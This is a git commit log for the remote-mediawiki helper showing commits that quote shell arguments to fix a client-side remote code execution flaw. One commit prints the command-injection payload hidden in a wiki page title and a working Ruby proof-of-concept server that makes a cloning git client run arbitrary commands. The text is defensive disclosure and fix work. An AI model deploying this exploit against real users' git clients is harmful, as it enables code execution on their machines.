But completely eliminating the use of unquoted shell arguments has a
value in and of itself, by making the code easier to review. As noted
in an earlier commit I think the use of IPC::Open3 would be too
verbose here, but this "sh -c" trick strikes the right balance between
readability and semantic sanity.

Suggested-by: Jeff King <peff@peff.net>
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
2020-09-21 12:37:38 -07:00
Ævar Arnfjörð Bjarmason
878d150106 remote-mediawiki: annotate unquoted uses of run_git()
Explicitly annotate the invocations of run_git() which don't use
quoted arguments. I'm not converting these to run_git_quoted() because
these invocations pipe stderr to /dev/null, which the Perl open() API
doesn't support.

We could do a quoted version of this with IPC::Open3, but I don't
think it's worth it to go through that here. Let's instead just mark
these sites, and comment on why it's OK to use the variables we're
using.

This eliminates the last uses of run_git(), so we can remove the alias
for it introduced in an earlier commit.

Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
2020-09-21 12:37:38 -07:00
Ævar Arnfjörð Bjarmason
4842a11794 remote-mediawiki: convert to quoted run_git() invocation
Change those callsites that are able to call run_safe() with a quoted
list of arguments to do so.

This fixes a RCE bug in this transport helper reported by Joern
Schneeweisz to the git-security mailing list. The issue is being made
public due to the relative obscurity of the remote-mediawiki code.

The security issue is that we'd execute a command like this via Perl's
"open -|", where the $name is taken directly from the api.php
response. So that a JSON response of e.g.:

    [...]"title":"`id>/tmp/mw`:Main Page"[..]

Would result in an invocation of:

    git config --add remote.origin.namespaceCache "`id>/tmp/mw`:notANameSpace"

>From code such as this, which is being changed by this patch:

    run_git(qq(config --add remote.${remotename}.namespaceCache "${name}:${store_id}"));

So we'd execute an arbitrary command, and also put
"remote.origin.namespaceCache=:notANameSpace" in the config. With this
change we quote all of this, so now we'll simply write
"remote.origin.namespaceCache=`id>/tmp/x`:notANameSpace" into the
config, and not execute any remote commands.

About the implementation: as noted in [1] (see also [2]) this style of
invoking open() has compatibility issues on Windows up to Perl
5.22. However, Johannes Schindelin notes that we shouldn't worry about
Windows in this context because (quoting a private E-Mail of his):

    1. The mediawiki helper has never been shipped as part of an
       official Git for Windows version. Neither has it ever been part
       of an official MSYS2 package. Which means that Windows users
       who want to use the mediawiki helper have to build Git
       themselves, which not many users seem to do.

    2. The last Git for Windows version to ship with Perl v5.22.x was
       Git for Windows v2.11.1; Since Git for Windows
       v2.12.0 (released on February 25th, 2017), only newer Perl
       versions were included.

So let's just use this open() API. Grepping around shows that various
other Perl code we ship such as gitweb etc. uses this way of calling
open(), so we shouldn't have any issues with compatibility.

For further reference and future testing, here's working exploit code
provided by Joern:

    #!/usr/bin/ruby
    # git client side RCE via `mediawiki` remote proof of concept
    # Joern Schneeweisz - GitLab Security Research Team

    require 'sinatra'
    set bind: '0.0.0.0'

    if not ARGV[0]

      puts "Please provide the shell command to be execucted."
      exit -1

    end

    cmd = ARGV[0]
    all_pages = sprintf('{"limits":{"allpages":500},"query":{"allpages":[{"pageid":1,"ns":3,"title":"`%s`:Main Page"}]}}', cmd)
    revs = sprintf('{"query":{"pages":{"1":{"pageid":1,"ns":3,"title":"`%s`:Main Page","revisions":[{"revid":1,"parentid":0,"user":"MediaWiki default","timestamp":"2020-09-04T20:25:08Z","contentformat":"text/x-wiki","contentmodel":"wikitext","comment":"","*":"<al:MyLanguage/Help:Contents]"}]}}}}', cmd)
    mainpage= sprintf('{"batchcomplete":"","query":{"pages":{"1":{"pageid":1,"ns":3,"title":"`%s`:Main Page","revisions":[{"revid":1,"parentid":0}]}}}}',cmd)

    post '/api.php' do

      if params[:list] == 'allpages'
        return all_pages
      end

      if params[:prop] == 'revisions'
        return revs
      end

      return mainpage
    end

Which:

    [...] should be run like: `ruby wiki.rb 'id>/tmp/mw'`. Now when
    being cloned with `git clone mediawiki::http://localhost:4567` the
    file `/tmp/mw` will be created during the clone process,
    containing the output of `id`.

1. https://perldoc.perl.org/functions/open.html#Opening-a-filehandle-into-a-command
2. https://perldoc.perl.org/perlipc.html#Safe-Pipe-Opens

Reported-by: Joern Schneeweisz <jschneeweisz@gitlab.com>
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
2020-09-21 12:37:38 -07:00
Ævar Arnfjörð Bjarmason
2d6b08aff4 remote-mediawiki: provide a list form of run_git()
Invoking commands as "git $args" doesn't quote $args. Let's support
["git", $args] as well, and create corresponding run_git_quoted() and
run_git_unquoted() aliases for subsequent changes when we move the
code over to the new style of invoking this function. At that point
we'll delete the then-unused run_git() wrapper.

Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
2020-09-21 12:37:38 -07:00